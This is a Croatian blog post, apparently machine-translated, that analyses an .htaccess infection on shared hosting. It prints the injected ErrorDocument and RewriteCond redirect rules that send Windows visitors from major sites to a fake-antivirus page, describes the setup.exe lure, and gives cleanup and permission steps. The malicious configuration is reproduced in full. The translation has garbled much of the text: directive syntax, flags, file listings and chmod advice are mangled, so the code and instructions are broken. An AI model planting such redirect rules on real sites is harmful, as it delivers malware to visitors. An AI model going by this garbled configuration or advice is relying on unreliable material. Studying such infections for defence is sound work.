Malware / Virus -. Htaccess "prepisati" i preusmjeravanje

Novi oblik virusa što ja ne vidim znam puno, utjecati na lokalitete domaćin na nepouzdani poslužitelji gdje korisnici računi / podračuna može "vidjeti" jedni druge. Naime, hosting računi su sve staviti u mapu "vhosts"Pisanje i pravo Korisnik mape su "vhosts" je dobio opću korisnički prodavača ... u većini situacija. To je tipična web poslužitelja koji ne koriste WHM / cPanel.

Djelovanje virusa htaccess -.. Htaccess Hack

Virus utjecati na datoteke .htaccess Site žrtve. I dodao linije / Direktiva na preusmjeriti posjetitelja (Stupanje na Yahoo, MSN, Google, Facebook, yaindex, Twitter, MySpace, itd. web stranice i portale s velikim prometom) na neke web stranice koje nude "antivirus. "To je lažni antivirusni, Koje sam napisao u uvodu .

Ovo je način kako .htaccess utjecati: (Ne pristupiti sadržaju URL-a u sljedeće linije)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine on

RewriteCond% {} HTTP_REFERER. * Yandex. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Odnoklassniki. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Vkontakte. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Rambler. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Tube. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Wikipedia. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Blogger. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Baidu. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Qq.com. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Myspace. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Twitter. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Facebook. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Google. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Uživo. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Aol. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Bing. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * MSN. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Amazon. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Ebay. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * LinkedIn. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Flickr. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * LiveJasmin. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Soso. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * DoubleClick. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Pornhub. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Orkut. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * LiveJournal. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Wordpress. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Yahoo. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Ask. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Excite. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * AltaVista. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * MSN. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Netscape. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * HotBot. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Goto. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Traženje informacija. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Mamma. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Alltheweb. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Lycos. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Traži. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * MetaCrawler. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Mail. * $ [NC, ILI]
RewriteCond% {} HTTP_REFERER. * Dogpile. * $ [NC]

RewriteCond% {} HTTP_USER_AGENT. * Windows *.
RewriteRule. * [R, L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {} REQUEST_FILENAME!-D
RewriteCond% {REQUEST_FILENAME} * JPG $ |!.. * GIF $ |. * PNG $
RewriteCond% {} HTTP_USER_AGENT. * Windows *.
RewriteRule. * [R, L]

Oni koji koriste WordPress ćete ove linije u datoteci .htaccess od public_html. Osim toga, virus stvara. Identične htaccess u mapu wp-sadržaja.

*Postoje i situacije u kojima se događa, umjesto peoriavascularsurgery.com dns.thesoulfoodcafe.com ili druge adrese.

Ono što čini ovaj virus.

Nakon preusmjeren, posjetitelj je dočekan raširenih ruku prema poruci:

Upozorenje!
Vaše računalo sadrži različite znakove virusa i zlonamjernih programa prisutnost. Vaš neposrednoj Zahtijeva protu-virus sustav, provjerite!
Sigurnosni sustav će izvesti brzo i besplatno skeniranje vašeg računala od virusa i malicioznih programa.

1 malware

Bez obzira što se pritisne tipka, mi smo preusmjereni na stranicu "Moje računalo"Stvoren da oponaša Dizajn XP. To automatski počinje "skeniranje" na kraju koje smo pronašli da je "zarazio".

2 malware

Nakon što kliknete U redu ili Odustani, počet će preuzimanjeFile-a setup.exe. Ovo setup.exe je lažni anti virus utječu na sustav. Možete instalirati neki zlonamjerni softver s propagandom naših daljnje linkovi virus, a osim njih anti-virus softver (Sve lažni) da je žrtva je pozvao na kupnju.
Oni koji su već kontaktirali virus može koristiti ovaj obrazac . Također se preporučuje za skeniranje cijelog tvrdog diska. Preporučiti Kaspersky Internet Security ili Kaspersky Anti-Virus.

Ova vrsta virusa utječe posjetitelja OS operativni sustavi Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 i Windows 95. Zasad nema poznatih slučajeva zaraze od operativnih sustava Windows Vista i Windows 7.

Kako možemo ukloniti ovaj virus. Htaccess datoteku na poslužitelju, i kako bi se spriječilo infekciju.

1. Analizirajte sumnjive datoteke i brisanje kodova. Kako bi se osiguralo da se datoteka ne samo da utječe .htaccess je bolje analizirati sve datoteke . PHP si . Js.

2. Prepisivanjem datoteku. Htaccess i ja postaviti chmod 644 ili 744 s pristupom čitanju samo Korisnik vlasnik.

3. Kada stvorite račun za hosting web stranice u mapu / Početna ili / Webroot To će automatski stvoriti mapu koja je često na ime (Korisnik za cPanel, FTP, Itd.). Da bi se spriječilo pisanje podataka i prijenosa virusa s jednog korisnika na drugog, preporuča se da svaki korisnik mape kako se postaviti:

chmod ili 644 744, 755 - prikazano je 644.
chown-R nume_user nume_folder.
chgrp-R nume_user nume_folder

LS-sve načina da provjerite ako su ispravno. Trebala bi se pojaviti nešto ovako:

drwx-x-x 12 dinamiku dinamiku svibnja 4096 6 14: 51 dinamiku /
drwx-x-x 10 Duran Duran ožujka 4096 7 07: 46 Duran /
drwx-x-x 12 4096 Jan 29 11 cijevi cijevi: cijevi 23 /
drwxr-xr-x 14 4096 veljače 26 2009 Express Express Express /
drwxr-xr-x 9 Ezo Ezo svibnja 4096 19 01: 09 Ezo /
drwx-x-x pharma pharma 9 4096 prosinca 19 22: 29 pharma /

Ako jedan od gore će biti userele FTP Zaražene datotekeTo se ne može poslati virus na drugu korisnika domaćina. To je minimalna sigurnosna mreža za zaštitu račune domaćin na web poslužitelju.

Zajednički elementi područjima pogođenim ovom tipu virusa.

Sva područja zahvaćena preusmjeriti posjetitelja na stranicama od strane domene koje sadrže "/".

Ovaj "virusa. htaccess"Utječe na bilo koju vrstu CMS (Joomla, WordPress, phpBBItd.) koji koristi .htaccess,

. Htaccess Preusmjeravanje Virus Hack &.

Malware / Virus -. Htaccess "prepisati" i preusmjeravanje

O autoru

Stealth LP

Osnivač i urednik Stealth PostavkeU 2006 dana.
Iskustvo na Linux operacijskim sustavima (pogotovo CentOS), Mac OS X, Windows XP> Windows 10 i WordPress (CMS).

Ostavite komentar

Ova web stranica koristi Akismet za smanjenje neželjene pošte. Saznajte kako se podaci vašeg komentara obrađuju.